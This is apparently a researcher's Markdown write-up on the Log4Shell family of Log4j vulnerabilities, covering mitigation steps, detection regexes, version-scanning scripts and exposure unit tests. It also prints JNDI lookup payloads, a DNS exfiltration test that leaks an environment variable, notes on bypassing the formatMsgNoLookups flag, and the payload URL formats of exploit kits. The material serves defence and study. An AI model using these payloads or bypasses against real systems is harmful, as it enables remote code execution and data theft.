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954 lines (631 loc) · 49.6 KB

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954 lines (631 loc) · 49.6 KB


This content:

  • Is created using Joplin and then exported as markdown.
  • Is based on my personal technical tests, searches and understanding of the vulnerability. Therefore, if you see a mistake or a wrong statement then feel free to raise an issue to allow me to fix the mistake and understand why I have made it 🙂

Additional information

Publishing location of the analysis

Action plan proposal to handle the vulnerability


⚠️ It's just a proposal based on my technical experience, it is not a silver bullet or a magic recipe!

I propose the following approache to decrease the attack/exploitation surface.

Step 1: Block callback/leakeage + artefact cartography

ℹ️ To be performed in parallel

  • Infrastructure team: Ensure that firewall rules defined prevent any app to establish a TCP connection to a public IP or public domain.
  • Infrastructure team: Ensure that DNS resolution rules defined prevent any app to resolve a external (public) domain or sub domain.
  • Infrastructure team: Add log4shell signatures in all security devices based on update provided by the associated vendor.
  • Security team: Use this script to identify occurences of log4j affected JNDI lookup class and, by extension, any occurence of log4j libraries (log4j-core at least) across all JAR/WAR/EAR files on systems.
  • Security team: Identify the usage of the artefact org.apache.logging.log4j:log4j-core across all java projects via the maven proxy software installed (Artifactory/Nexus) in the company.
  • Development team: Identify the usage of the artefact org.apache.logging.log4j:log4j-core in any java project via the source code. In addition identify occurence of element in code, via this set of regexes, allowing to bypass the protection bring by the parameter log4j2.formatMsgNoLookups=true. To complete, identify also any usage of the printf() function on a logger in the code because this one is also prone to the bypass (regex for this is hard/error-prone because printf function is also part of System.(out|err)).

Help commands for development team - On Windows, replace grep by Select-String -pattern "xxx" (Select-String documentation):

# For Maven based project
$ mvn dependency:tree | grep "org.apache.logging.log4j:log4j-"
[INFO] +- org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO] |  \- org.apache.logging.log4j:log4j-api:jar:2.14.1:compile
# For Gradle based project
$ gradlew dependencies | grep "org.apache.logging.log4j:log4j-"
\--- org.apache.logging.log4j:log4j-core:2.14.1
     \--- org.apache.logging.log4j:log4j-api:2.14.1

Step 2: Patching

Security team:

Prioritize apps to be patched by order according to their reachability by attackers and provide this order to the development team:

  1. Internet facing.
  2. DMZ 1 / DMZ 2 / DMZ x.
  3. Backend.

Development team:

  • Idealy upgrade to the last version of Log4J (sync all artefacts from GroupID org.apache.logging.log4j).
  • If not possible AND the current version of Log4J is >= 2.10.0: Set the JVM parameter log4j2.noFormatMsgLookup=true. You still be exposed to the CVE-2021-45046 and to the CVE-2021-45105 (depending on your version for CVE-2021-45105).
  • If not possible AND the current version of Log4J is < 2.10.0: Upgrade is mandatory!
  • Add these security unit tests to the project test suite to continuously ensure that the version used of log4j is not exposed to log4shell vulnerability: Run them one at the time in sequence!

Step 3: Security monitoring

  • Infrastructure team: Update regularly log4shell signatures in all security devices based on update provided by the associated vendor.
  • Security team: Add app logs to the SIEM in order to detect exception raised by JVM during log4shell payload tentative.
    • JNDI lookup failed:
      • Regex: (Error\slooking\sup\sJNDI\sresource\s\[.*?\])
      • Live example.
    • DOS tentative on a version not impacting the main program:
      • Regex: (AppenderLoggingException:\sjava\.lang\.OutOfMemoryError)
      • Live example.
    • DOS tentative on a version not vulnerable:
      • Regex (many occurences of the pattern }}}}}... ending a large expression): (\}\}\}\}\}\}\}\}\}\})
      • Live example.
    • DOS successful tentative on a version vulnerable:
      • Regex: (java\.lang\.OutOfMemoryError:\sJava\sheap\sspace[\n\r\ta-z0-9A-Z\.\s:()<>]+?\(StrSubstitutor\.java)
      • Live example.

Overview of the proposed regular expressions:




Important remark regarding vulnerability scanning

If a vulnerablility scan is launched to detect log4shell exposure then ensure the following properties of the scan:

  • Perform a web app scan and not an IP scan.
  • Indicate the correct VHOST.
  • Indicate the correct Context Path.
  • Indicate the correct HTTP methods.
  • Indicate the correct Path to the controllers/services.
  • Indicate the correct list of parameters.
  • Do not forget API: For this use the OpenAPI/WSDL descriptor to ensure that the scanner will know all the services and how to correcty call them.

This set of properties have for objective to ensure that the scanner will correctly call the endpoints with its log4shell test payloads in all supported parameters (body/header/query string) of the endpoints.

⚠️ Monitor your network devices event (firewall/WAF/IPS/...) to catch payloads submitted by the scanner that will trigger the vulnerability but for which the callback or dns resolution will be blocked. Otherwise the scan will report that the target is not vulnerable and it will be a false-negative.

Content of the initial analysis

📚 Below are the collection of information discovered about this vulnerability and affected versions that was initially shared on the LinkedIn post above

For a project managed via maven, you can use the following set of command to analyses all the modules dependencies:

# See
$ mvn dependency:copy-dependencies

For project managed via gradle, you can use this task to perform the mvn dependency:copy-dependencies of maven.

ℹ️ Initial LinkedIn post where I gathered all the information discovered about this vulnerability and affected versions.

Many prefixes are available:


Prefixes can be combined:


In recent version (2.14.1) spring and kubernetes prefixes were supported. For Kubernetes, access is constrained to the following information:


For the record, lower and upper prefixes were introduced from the version 2.13.0 of log4j2-core. So, if an expression use such prefix, like for example ${lower:JNDI} in version < 2.13.0 then it will be rendered AS IS: ${lower:JNDI}



Based on CERT FR documentation provided (thanks to Pierre Dewez), I performed a test on the DNS resolution with prefixes combination in a expression for data leakage via DNS because RCE is not the only problem (even if it is the most important one).

For log4j-core <= 2.7, prefixes combination in a expression seems not supported:


For log4j-core >= 2.8, prefixes combination in a expression is supported:


With the help of Sébastien Kaiser, we achieve to create a little regex to identify log4j expressions:

grep -r --include "*.log" -nwE '\$\{.*?:.*\}' .

Attempt to tune to prevent the usage of .* failed, we did not achieve to made grep accept it. On another side, it catch any log4j expression because they are already many bypass available/published.

Proposed regex was based on expressions seen in logs as well as the characters used for an expression:


Data exfiltration via DNS on recent version of Java (JDK 11/12/15/17) is effective:





Regarding the data exfiltration via DNS, there is a constraint on accepted characters and I did not find a prefix to encode data or a way to use a subset. The last version of log4j-core provide a Base64 prefix but it is for decoding and this new prefix is not present before the 2.5.0:



So based on this to be exfiltrated via DNS, a data must have the format [0-9A-Za-z\-_]* because (at least I have not found) there is no easy way to encode/cut/split the data to bypass this constraint.

Theoretical way to bypass the constraints above (POC required):




The following exception is raised when a DNS resolution failed, for example, if a not allowed character is used in sub domain name:

2021-12-14 07:58:14,165 main WARN Error looking up JNDI resource [dns://ab']. javax.naming.ConfigurationException: Unknown DNS server: ab' [Root exception is No such host is known (ab']; remaining name '.'
	at jdk.naming.dns/com.sun.jndi.dns.DnsClient.<init>(
	at jdk.naming.dns/com.sun.jndi.dns.Resolver.<init>(
	at jdk.naming.dns/com.sun.jndi.dns.DnsContext.getResolver(DnsContext.jav

When the resolution succeed then the following exception can occur:

2021-12-14 07:57:58,989 main WARN Error looking up JNDI resource [dns://]. javax.naming.CommunicationException: DNS error [Root exception is Receive timed out]; remaining name '.'
	at jdk.naming.dns/com.sun.jndi.dns.DnsClient.query(
	at jdk.naming.dns/com.sun.jndi.dns.Resolver.query(
	at jdk.naming.dns/com.sun.jndi.dns.DnsContext.c_lookup(
	at java.naming/com.sun.jndi.toolkit.ctx.ComponentContext.p_lookup(
	at java.naming/com.sun.jndi.toolkit.ctx.PartialCompositeContext.lookup(
	at java.naming/com.sun.jndi.toolkit.url.GenericURLContext.lookup(Generic

So, the following regex can be use to identify injection tentative (failed and some succeed) - Live Example:


Code for the DNS test - InteractSH Github repository:

Logger log = LogManager.getLogger(Sandbox2.class);
System.out.printf("LOG4J2 version: %s\n", log.getClass().getPackage().getImplementationVersion());
System.out.printf("Java version  : %s\n", System.getProperty("java.version"));
//On linux use ${env:USER}"${jndi:dns://${env:USERNAME}}");

Unit test case for CVE-2021-44228

The following unit tests suite can be added to a project to continuously ensure that the version used of log4j-core is not exposed to log4shell vulnerability.

Execution on the unit test against log4j-core 2.14.1 (vulnerable):


Execution on the unit test against log4j-core 2.16.0 (patched):


Note about the affected JNDI class presence

The following script was created to identify, in which jar files of a complete distribution of Log4J2, the class org.apache.logging.log4j.core.lookup.JndiLookup is present:

# Script to identify Log4J affected class for CVE-2021-44228 in a distribution of LOG4J2
# See
echo -e "\e[93m[+] Download and uncompress release $VERSION archive...\e[0m"
rm -rf $WORKDIR 2>/dev/null
mkdir $WORKDIR
unzip -q -d $WORKDIR $WORKBIN
echo -e "\e[93m[+] Search class '$TARGET_CLASS_NAME' across all jar files...\e[0m"
for lib in $(find $WORKDIR -iname "*.jar")
    find=$(unzip -l $lib | grep -c "$TARGET_CLASS_NAME")
	if [ $find -ne 0 ]
		echo "'$(basename $lib)' file contains the class."
echo -e "\e[93m[+] Cleanup...\e[0m"
rm -rf $WORKDIR 2>/dev/null

Execution against the release 2.14.1:

$ bash "2.14.1"
[+] Download and uncompress release 2.14.1 archive...
[+] Search class 'org/apache/logging/log4j/core/lookup/JndiLookup.class' across all jar files...
'log4j-core-2.14.1.jar' file contains the class.
[+] Cleanup...

Execution against all published releases:

Utility script named

while IFS= read -r line
  bash $line
done < "versions.txt"


# "data.txt" file created using this page html content:
$ head -5 data.txt
[DIR] 2.0-alpha1/                    2016-05-30 04:49    -
[DIR] 2.0-alpha2/                    2016-05-30 04:49    -
[DIR] 2.0-beta1/                     2016-05-30 04:49    -
[DIR] 2.0-beta2/                     2016-05-30 04:49    -
[DIR] 2.0-beta3/                     2016-05-30 04:49    -
$ cat data.txt | cut -d'/' -f1 | cut -d' ' -f2 | sort > versions.txt
$ head -5 versions.txt
$ bash | grep "file contains the class"
'log4j-core-2.0.jar' file contains the class.
'log4j-core-2.0-beta9.jar' file contains the class.
'log4j-core-2.0-rc1.jar' file contains the class.
'log4j-core-2.0-rc2.jar' file contains the class.
'log4j-core-2.0.1.jar' file contains the class.
'log4j-core-2.0.2.jar' file contains the class.
'log4j-core-2.1.jar' file contains the class.
'log4j-core-2.10.0.jar' file contains the class.
'log4j-core-2.11.0.jar' file contains the class.
'log4j-core-2.11.1.jar' file contains the class.
'log4j-core-2.11.2.jar' file contains the class.
'log4j-core-2.12.0.jar' file contains the class.
'log4j-core-2.12.1.jar' file contains the class.
'log4j-core-2.12.2.jar' file contains the class.
'log4j-core-2.13.0.jar' file contains the class.
'log4j-core-2.13.1.jar' file contains the class.
'log4j-core-2.13.2.jar' file contains the class.
'log4j-core-2.13.3.jar' file contains the class.
'log4j-core-2.14.0.jar' file contains the class.
'log4j-core-2.14.1.jar' file contains the class.
'log4j-core-2.15.0.jar' file contains the class.
'log4j-core-2.16.0.jar' file contains the class.
'log4j-core-2.2.jar' file contains the class.
'log4j-core-2.3.jar' file contains the class.
'log4j-core-2.4.jar' file contains the class.
'log4j-core-2.4.1.jar' file contains the class.
'log4j-core-2.5.jar' file contains the class.
'log4j-core-2.6.jar' file contains the class.
'log4j-core-2.6.1.jar' file contains the class.
'log4j-core-2.6.2.jar' file contains the class.
'log4j-core-2.7.jar' file contains the class.
'log4j-core-2.8.jar' file contains the class.
'log4j-core-2.8.1.jar' file contains the class.
'log4j-core-2.8.2.jar' file contains the class.
'log4j-core-2.9.0.jar' file contains the class.
'log4j-core-2.9.1.jar' file contains the class.

So, focus can be made on the artifact org.apache.logging.log4j:log4j-core when searching for usage of Log4J2 in project source code / maven proxy / projet descriptor (maven, gradle).

Note about the security flags

The following script was created to identify, in which version of Log4j2, the flag log4j2.formatMsgNoLookups or log4j2.enableJndi were present based on sources provided with complete distribution of Log4J2:

# Script to identify Log4J version supporting security flags mentioned in CVE advisory
# See
echo -e "\e[93m[+] Download and uncompress release $VERSION archive...\e[0m"
rm -rf $WORKDIR 2>/dev/null
mkdir $WORKDIR
unzip -q -d $WORKDIR $WORKBIN
echo -e "\e[93m[+] Search flags across all sources files ...\e[0m"
for lib in $(find $WORKDIR -iname "*-sources.jar")
	rm -rf $WORKSRC 2>/dev/null
	mkdir $WORKSRC
	unzip -q -d $WORKSRC $lib
	# See
    find=$(grep -r --include "*.java" "log4j2\.formatMsgNoLookups" $WORKSRC | wc -l)
	if [ $find -ne 0 ]
		echo "'$(basename $lib)' file contains the flag: 'log4j2.formatMsgNoLookups'."
	# See
    find=$(grep -r --include "*.java" "log4j2\.enableJndi" $WORKSRC | wc -l)
	if [ $find -ne 0 ]
		echo "'$(basename $lib)' file contains the flag: 'log4j2.enableJndi'."
echo -e "\e[93m[+] Cleanup...\e[0m"
rm -rf $WORKDIR 2>/dev/null
rm -rf $WORKSRC 2>/dev/null

Execution against all published releases:

Utility script named

while IFS= read -r line
  bash $line
done < "versions.txt"


# "data.txt" file created using this page html content:
$ head -5 data.txt
[DIR] 2.0-alpha1/                    2016-05-30 04:49    -
[DIR] 2.0-alpha2/                    2016-05-30 04:49    -
[DIR] 2.0-beta1/                     2016-05-30 04:49    -
[DIR] 2.0-beta2/                     2016-05-30 04:49    -
[DIR] 2.0-beta3/                     2016-05-30 04:49    -
$ cat data.txt | cut -d'/' -f1 | cut -d' ' -f2 | sort > versions.txt
$ head -5 versions.txt
$ bash | grep "file contains the flag"
'log4j-core-2.10.0-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.11.0-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.11.1-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.11.2-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.12.0-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.12.1-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.12.2-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.12.2-sources.jar' file contains the flag: 'log4j2.enableJndi'.
'log4j-core-2.13.0-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.13.1-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.13.2-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.13.3-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.14.0-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.14.1-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.15.0-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.16.0-sources.jar' file contains the flag: 'log4j2.formatMsgNoLookups'.
'log4j-core-2.16.0-sources.jar' file contains the flag: 'log4j2.enableJndi'.

So based on the results above:

  • Flag log4j2.formatMsgNoLookups can be used on Log4j2 version >= 2.10.0 (source ref).
  • Flag log4j2.enableJndi can be used on Log4j2 versions 2.12.2 and 2.16.0 only (source ref).

The following script was created and used in combination of a test Maven project using this test class to identify in which versions >= 2.10.0 the flag is log4j2.formatMsgNoLookups is effective or not:

Script and POM file of the test project:


Execution with the security flag disabled to verify that the unit test is OK:


Execution with the security flag enabled to see the protection state:


So based on the results above: The flag is effective on versions >= 2.10.0.

Note about formatMsgNoLookups bypass

This bypass was bring by the CVE-2021-45046.

Below is a POC from LunaSecIO showing the vulnerability and its exploitation context:



A unit tests suite was created and used to perform some tests for the bypass of log4j2.formatMsgNoLookups=true:

Version 2.14.1 seems to be exposed to the bypass:


Version 2.15.0 do not seems to be exposed to the bypass:


Note that a usage of the printf() function, like for example victim.printf(Level.INFO,"%s",TEST_PAYLOAD);, have the same effect that using the ThreadContext combined with a expression in the log pattern:



So a unit tests suite was also created for this bypass:

On version 2.15.0 - By default:

  • JNDI with DNS protocol is not allowed:


  • JNDI with LDAP(S) protocol require defining allowed hosts:


Regarding LDAP(S), a bypass of the validation against allowed hosts was identified:

Regarding the following bypass disclosed on Twitter:




It seems not effective on Java 17 (current LTS) and Java 11 (previous LTS), at least, using a "standart" DNS listener:



Some DNS client, like dig, perform some cleanup so the bypass become functional:


However, as the JVM (at least 8/11/17) do not perform any cleanup and take the value AS IS for the host then it raise an error about the invalid host name exception: so my hypothesis (perhaps I am totally wrong) is that the bypass need a "lazy" DNS listener accepting characters normally not supported in a domain name (like #):


⁉️ However, there is still questions in my head about how the not "normal" DNS query with the domain name find is way to the DNS listener of the attcker because it will pass before by "normal" DNS resolvers that will normally reject the DNS query...This point need specific investigation and real POC to be sure that is really effective!

I have my reply thanks to the author of the tool:



So it's possible to exfiltrate data by DNS that do not follow the standart name of a sub domain.

However, it do not work with listener services like (include Burp Collaborator):

Test with



Test with



So, a custom DNS listener must be used, like Knary for example, but, to summarize the exfiltration by DNS is really effective.

The following script was used in combination of the unit test cases to verify which version >= 2.10.0 is exposed to the bypass:

Utility script named

echo "[+] JDK"
java -version
echo "[+] TEST"
while IFS= read -r line
  mvn -q -D"test=Log4ShellExposureTestFormatMsgNoLookupsBypass" -D"$line" -D"log4j2.formatMsgNoLookups=true" clean test 1>/dev/null
  mvn -q -D"test=Log4ShellExposureTestFormatMsgNoLookupsBypassWithPrintf" -D"$line" -D"log4j2.formatMsgNoLookups=true" clean test 1>/dev/null
  rc=$(($rc1 + $rc2))
  echo ">>> RC: $rc"
  if [ $rc -ne 0 ]
    echo "<<< Version $line flag log4j2.formatMsgNoLookups NOT effective."
    echo "<<< Version $line flag log4j2.formatMsgNoLookups IS effective."
done < "versions.txt"



So based on the results above: Version 2.12.2, 2.15.0 and 2.16.0 seems not prone to the bypass. it reinforces the fact that update is the only reliable way regardring the 45046.

Identify formatMsgNoLookups bypass exposure in source code

Even if it is better to use a SAST tool to identify weaknesses in source code, the following regexes can be used to quickly spot, across a code base, presence of the elements needed by the bypass:

Search for ThreadContext class usage

Keycloak code base do not contains any reference to ThreadContext. I added them to test the regex on a large initial code base.


$ grep -r --include "*.java" -nwE '(ThreadContext\.put|import\sorg\.apache\.logging\.log4j\.ThreadContext)' .
./saml-core/src/main/java/org/keycloak/rotation/ org.apache.logging.log4j.ThreadContext;
./saml-core/src/main/java/org/keycloak/rotation/            ThreadContext.put("InsecureVariable", TEST_PAYLOAD);


PS> Get-ChildItem -Path .\keycloak-main\  -Include "*.java" -Recurse | Select-String -Pattern "(ThreadContext\.put|import\sorg\.apache\.logging\.log4j\.ThreadContext)" -CaseSensitive
keycloak-main\saml-core\src\main\java\org\keycloak\rotation\ org.apache.logging.log4j.ThreadContext;
keycloak-main\saml-core\src\main\java\org\keycloak\rotation\                ThreadContext.put("InsecureVariable", TEST_PAYLOAD);

Search for Thread Context Map usage

Keycloak code base do not contains any reference to Thread Context Map. I added them to test the regex on a large initial code base.



$ grep -r --include "*.java" --include "*.properties" --include "*.xml" --include "*.json" --include "*.yaml" --include "*.yml" -nwE '%(X|mdc|MDC)\{\s*.*?\s*\}' .
./core/src/main/java/org/keycloak/        appenderBuilder.add(builder.newLayout("PatternLayout").addAttribute("pattern", "${ctx:InsecureVariable} %X{TEST}- %m%n"));
./testsuite/integration-arquillian/servers/app-server/jetty/common/src/test/resources/{HH:mm:ss,SSS} %mdc{clientNumber2} %-5p %t %MDC{clientNumber3} [%c] %m%n
./testsuite/model/src/test/resources/{HH:mm:ss,SSS} %-5p %X{clientNumber} [%c] (%t) %m%n


PS> Get-ChildItem -Path .\keycloak-main\  -Include "*.java","*.properties","*.xml","*.json","*.yaml","*.yml" -Recurse | Select-String -Pattern "%(X|mdc|MDC)\{\s*.*?\s*\}" -CaseSensitive
keycloak-main\core\src\main\java\org\keycloak\        appenderBuilder.add(builder.newLayout("PatternLayout").addAttribute("pattern",
"${ctx:InsecureVariable} %X{TEST}- %m%n"));
keycloak-main\testsuite\integration-arquillian\servers\app-server\jetty\common\src\test\resources\{HH:mm:ss,SSS} %mdc{clientNumber2}
%-5p %t %MDC{clientNumber3} [%c] %m%n
keycloak-main\testsuite\model\src\test\resources\{HH:mm:ss,SSS} %-5p %X{clientNumber} [%c] (%t) %m%n

Search for expression usage

Another regex to identify usage of expressions based on log4j prefixes like ${ctx:xxx}, ${map:xxx} ...


$ grep -r --include "*.java" --include "*.properties" --include "*.xml" --include "*.json" --include "*.yaml" --include "*.yml" -nwE '\$\{\s*(ctx|log4j|sys|env|main|marker|java|base64|lower|upper|sd|map|jndi|jvmrunargs|date|event|bundle):.*?\s*\}'
core/src/main/java/org/keycloak/    private static final String TEST_PAYLOAD = "${jndi:ldap://}";
core/src/main/java/org/keycloak/        appenderBuilder.add(builder.newLayout("PatternLayout").addAttribute("pattern", "${ctx:InsecureVariable} %X{TEST}- %m%n"));
quarkus/runtime/src/main/java/org/keycloak/quarkus/runtime/cli/command/            "Keycloak ${sys:kc.version}",


PS> Get-ChildItem -Path .\keycloak-main\ -Include "*.java","*.properties","*.xml","*.json","*.yaml","*.yml" -Recurse | Select-String -Pattern "\$\{\s*(ctx|log4j|sys|env|main|marker|java|base64|lower|upper|sd|map|jndi|jvmrunargs|date|event|bundle):.*?\s*\}" -CaseSensitive
keycloak-main\core\src\main\java\org\keycloak\    private static final String TEST_PAYLOAD = "${jndi:ldap://}";
keycloak-main\core\src\main\java\org\keycloak\        appenderBuilder.add(builder.newLayout("PatternLayout").addAttribute("pattern",
"${ctx:InsecureVariable} %X{TEST}- %m%n"));
keycloak-main\quarkus\runtime\src\main\java\org\keycloak\quarkus\runtime\cli\command\            "Keycloak ${sys:kc.version}",

Case of non patchable application

It can happen a case in which an app do not support the last patched version of log4j due to different reasons like: old business application, app for which the vendor stopped the support, app for which the vendor do not exsits anymore and so on...

If the app run on Java <= 8 then the following idea can be tried:

💡 These versions of java (I have tested on Java 8) support an undocumented JVM property named socksNonProxyHosts allowing to leverage a SOCKS proxy as a "firewall" at JVM level.

This property specify IPs/Hosts for which a SOCKS proxy must not be applied, so, using the associated official SOCKS properties (section 2.4) socksProxyHost / socksProxyPort, it is possible to define a whitelist of IPs/Hosts (via the JVM) to which the app can connect to.

Test sample code:

The code try to contact an internal and a external hosts via an HTTP GET request, access to the external host is not expected in this case.


Test on Java 8: Property socksNonProxyHosts supported


Test on Java 11: Property socksNonProxyHosts not supported


Test on Java 17: Property socksNonProxyHosts not supported


I have tested on Java 8/11/17 because they are Long-Term Support (LTS) official versions.

‼️ Ensure that no HTTP/HTTPS/FTP proxy is defined via its associated properties because it have a higher priority, below is an extract of the documentation:


Note about exposure to DOS by CVE-2021-45105

This issue was bring by the CVE-2021-45105.

The following unit test case was provided to detect exposure:

The following script, named, was created and used in combination with the unit test above to identify which version was affected:

echo "[+] JDK"
java -version
echo "[+] TEST"
while IFS= read -r line
  mvn -q -D"test=Log4ShellDOSExposureTest" -D"$line" -D"log4j2.formatMsgNoLookups=true" clean test 1>/dev/null 2>&1
  if [ $rc -ne 0 ]
    echo "[RC: $rc] Version $line IS vulnerable."
    echo "[RC: $rc] Version $line IS NOT vulnerable."
done < "all-versions.txt"

Below is the result of its execution - The flag log4j2.formatMsgNoLookups was enabled to perform the test with all defensive measures actives on versions supporting it:


Not all versions below the 2.17.0 were exposed and the results is interesting. Indeed, old version like for example 2.4 (2016-05-30) is not vulnerable but a recent version like for example 2.14.1 (2021-03-12) is vulnerable.

So, it is important to test the version used because exposure is not systematic!

A test was performed on Java8 on a non-vulnerable version and even if an OutOfMemory error occurs, the main program continue and finish normally:


On the 2.4, the OutOfMemory error is not triggered at all:


Same behavior for 2.4.1 and 2.5:



Note about JNDI-Exploit-Kit

During my work with my mates Paul Jung/Sébastien Kaiser from CERT-XLM/SOC, I have remarked the following thing. Sometime the tool JNDI-Exploit-Kit is used.

By exploring it locally, I noticed that its web server (Jetty) appear as a abyss service:



Payload java compiled class are served by the web server using this URL format: http://[HOST]:[PORT]/ExecTemplateJDK5.class

The name of the class file have this format: ExecTemplateJDK[0-9].class:


So, it is possible once the web port was identified, to try downloading all templates class files compiled with the configured command using FFUF:

$ ffuf -c -w nbr.txt -u "" -fs 0


Note about the exploit kit named JNDIExploit

During my work on this tool, I discovered the following exploit kit:

The first one, named JNDIExploit, raised my attention because it was supporting the URL format that I was often seeing during my work with CERT-XLM/SOC: ldap://[HOST]:[PORT]/Basic/Command/Base64/[BASE64_ENCODED_COMMAND]

For the following payload mode, the class name was composed by a suffix of 9 characters (charset [0-9A-Za-z]{9}) making the class name unique to each LDAP URL call:




Example with several call to the same payload delivery LDAP URL with the same command:


So it made a brute force operation hard due to the charset. However, the other payload modes, the name of the class was static including the name of the "developer" in the package name:



String TOMCAT = "com.feihong.ldap.template.TomcatMemshellTemplate";
String JETTY = "com.feihong.ldap.template.JettyMemshellTemplate";
String WEBLOGIC = "com.feihong.ldap.template.WeblogicMemshellTemplate";
String JBOSS = "com.feihong.ldap.template.JBossMemshellTemplate";
String WEBSPHERE = "com.feihong.ldap.template.WebsphereMemshellTemplate";
String SPRING = "com.feihong.ldap.template.SpringMemshellTemplate";

The URL became the following:



So, using FFUF like used for JNDI-Exploit-Kit, it is possible to grab the class to identify:

  • Usage of JNDIExploit.
  • The execution command defined when the kit was started (if applicable).

For the record, the web server is recognized by NMAP as a JBOSS app server even if it is a embedded web server using the JDK classes*:


Note about exposure to RCE by CVE-2021-44832

This issue was bring by the CVE-2021-44832. This analysis is based on the blog post created by the company that discovered the vulnerability.

ℹ️ The vulnerability is explained in the blog post so I focused on exploitation context while keeping the previous CVEs in mind.

To be able to exploit the vulnerability, an attacker need the following conditions:

  • Case 1: Being able to act on the log4j configuration loaded by the app. For example by controlling the configuration location or the appender parts of the configuration to add/alter a JdbcAppender.
  • Case 2: The targeted existing log4j configuration must use a JdbcAppender for which the attacker must be able to act on the loading location of the DataSource.

Indeed, as the DataSource property of the JdbcAppender support JNDI lookup, via the attribute jndiName, then we fall back on the previous CVEs and log4shell by extension.

❗ It is important to note that, once loaded, a configuration is not reloaded automatically by default. So, if an attacker achieve to alter a existing configuration then he must be also able to instruct the app/log4j to reload the altered configuration if an automatic reconfiguration interval is not explicitly defined.

Take a look at this demonstration to see that the configuration is not automatically reloaded by default.

Extract from the documentation about the Automatic Reconfiguration:


💡 To summarize: The vulnerability is real BUT it requires specific conditions that are not common for an app. Indeed, allowing the external sphere to control the log4j configuration location/content is rare, at least, I never seen this...

🗓️ The upgrade must be scheduled but using your standard patching process, not with the same urgency than for the previous CVEs related to log4shell.

⚠️ Personal point fo view: Keep in mind that this CVE and the blog post come from a vendor of security tools, so, the CVE/blog post are both part of a marketing strategy as we are near to a new year:


Below are regexes to identify in your code base if you are using a JdbcAppender with a DataSource. It allow you to take a look at the exposure of the configuration against CVE-2021-44832 and then define the patching agenda:

Note about the proposed regexes:

  • For the Properties configuration file type, if connectionSource.type is set to DataSource then there is a JNDI name associated to the configuration.
  • Focus for this CVE was made on XML and Properties file types because there are the most commons ones used.


$ grep -r --include "*.xml" --include "*.properties" -nwE '(DataSource\s.*?jndiName|connectionSource\.type\s*=\s*DataSource)' .
./sandbox/src/main/resources/log4j2-poc.xml:5: <DataSource jndiName="ldap://" />
./sandbox/src/main/resources/ = DataSource
./sandbox/target/classes/log4j2-poc.xml:5: <DataSource jndiName="ldap://" />


PS> Get-ChildItem -Path $pwd -Include "*.properties","*.xml" -Recurse | Select-String -Pattern "(DataSource\s.*?jndiName|connectionSource\.type\s*=\s*DataSource)" -CaseSensitive
sandbox\src\main\resources\log4j2-poc.xml:5: <DataSource jndiName="ldap://" />
sandbox\src\main\resources\ = DataSource
sandbox\target\classes\log4j2-poc.xml:5: <DataSource jndiName="ldap://" />